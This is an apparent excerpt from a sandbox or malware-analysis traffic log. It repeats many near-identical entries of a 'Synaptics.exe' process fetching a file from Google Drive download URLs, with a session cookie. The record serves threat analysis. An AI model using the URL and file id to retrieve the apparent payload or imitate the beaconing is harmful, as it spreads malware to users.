                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
